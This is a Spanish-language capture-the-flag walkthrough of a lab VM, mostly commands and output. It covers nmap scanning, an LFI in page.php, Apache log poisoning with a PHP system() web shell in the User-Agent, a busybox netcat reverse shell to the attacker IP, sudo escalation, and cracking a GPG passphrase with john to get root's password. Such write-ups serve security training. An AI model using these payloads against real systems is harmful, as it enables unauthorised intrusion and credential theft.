Identificamos la IP de la máquina víctima:
❯ arp-scan --interface=wlan0 --localnet | grep PCS | awk '{print $1}'
10.207.245.101Enumeramos puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 10.207.245.101
[sudo] contraseña para wh01s17:
Starting Nmap 7.98 ( https://nmap.org ) at 2025-11-08 14:27 -0300
Nmap scan report for 10.207.245.101
Host is up (0.00022s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:9C:81:19 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 1.30 seconds❯ nmap -sCV -p 22,80 -oN 02-targeted.txt 10.207.245.101
Starting Nmap 7.98 ( https://nmap.org ) at 2025-11-08 14:27 -0300
Nmap scan report for 10.207.245.101
Host is up (0.00037s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey:
| 256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_ 256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: vTeam a Corporate Multipurpose Free Bootstrap Responsive template
|_http-server-header: Apache/2.4.62 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.36 secondsAl navegar el sitio, los enlaces del navbar cargan contenido con un parámetro inc, lo que delata un LFI. Lo confirmamos leyendo /etc/passwd:
❯ curl 'http://10.207.245.101/page.php?inc=/etc/passwd' | grep bash
root:x:0:0:root:/root:/bin/bash
low:x:1000:1000:low:/home/low:/bin/bashFuzzeamos rutas accesibles vía LFI y encontramos el log de Apache:
❯ ffuf -u 'http://10.207.245.101/page.php?inc=FUZZ' -w ~/Documents/wordlists/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt -fw 5
...
/var/log/apache2/access.log [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 6ms]
...Aprovechamos el LFI para hacer log poisoning: inyectamos código PHP en el User-Agent (que queda registrado en el log) y luego incluimos el log, ejecutando el comando pasado por cmd:
❯ curl -H "User-Agent: <?php system(\$_GET['cmd']); ?>" "http://10.207.245.101/"
❯ curl 'http://10.207.245.101/page.php?inc=/var/log/apache2/access.log&cmd=id'
...
10.207.245.35 - - [08/Nov/2025:19:58:14 +0100] "GET / HTTP/1.1" 200 11906 "-" "uid=33(www-data) gid=33(www-data) groups=33(www-data)
...Convertimos la ejecución en una reverse shell accediendo a http://10.207.245.101/page.php?inc=/var/log/apache2/access.log&cmd=busybox%20nc%2010.207.245.35%201234%20-e%20/bin/bash:
❯ ncat -nlvp 1234
Ncat: Version 7.98 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.207.245.101:50938.
script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@lower5:/var/www/html$La escalada se hace en dos saltos sudo. Primero, www-data puede ejecutar bash como low:
www-data@lower5:/home$ sudo -l
Matching Defaults entries for www-data on lower5:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty
User www-data may run the following commands on lower5:
(low) NOPASSWD: /usr/bin/bash
www-data@lower5:/home$ sudo -u low bash
low@lower5:/home$Ahora low puede ejecutar pass (el gestor de contraseñas estándar de Unix) como root:
low@lower5:~$ sudo -l
Matching Defaults entries for low on lower5:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty
User low may run the following commands on lower5:
(root) NOPASSWD: /usr/bin/passListamos el almacén de contraseñas, que contiene una entrada root/password:
low@lower5:~$ sudo /usr/bin/pass
Password Store
└── root
└── passwordAl intentar leerla, pass (que cifra con GPG) pide la passphrase de la clave secreta:
low@lower5:~$ sudo /usr/bin/pass root/password
lqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqk
x Introduzca frase contraseña para desbloquear la clave secreta OpenPGP: x
x "administrator (password) <admin@lower5.nyx>" x
x clave de 1024-bit RSA, ID E70EBB1C2CFFB642, x
x creada el 2025-04-09 (ID de clave primaria 9AD17885DA2449A1). x
x x
x x
x Frase contraseña: ____________________________________________________ x
x x
x <OK> <Cancelar> x
mqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqjEn el home de low hay un root.gpg; lo transferimos a nuestra máquina y crackeamos la passphrase con john:
❯ gpg2john root.gpg > hash
❯ john -w=/home/wh01s17/Documents/wordlists/rockyou_utf8.txt hash
...
Password1 (administrator)
...Volvemos a ejecutar pass con la passphrase descubierta para revelar la contraseña de root:
low@lower5:~$ sudo /usr/bin/pass root/password
r00tP@zzW0rD123Y nos autenticamos como root:
low@lower5:~$ su root
Contraseña: r00tP@zzW0rD123
root@lower5:/home/low#Obtenemos la flag y fin.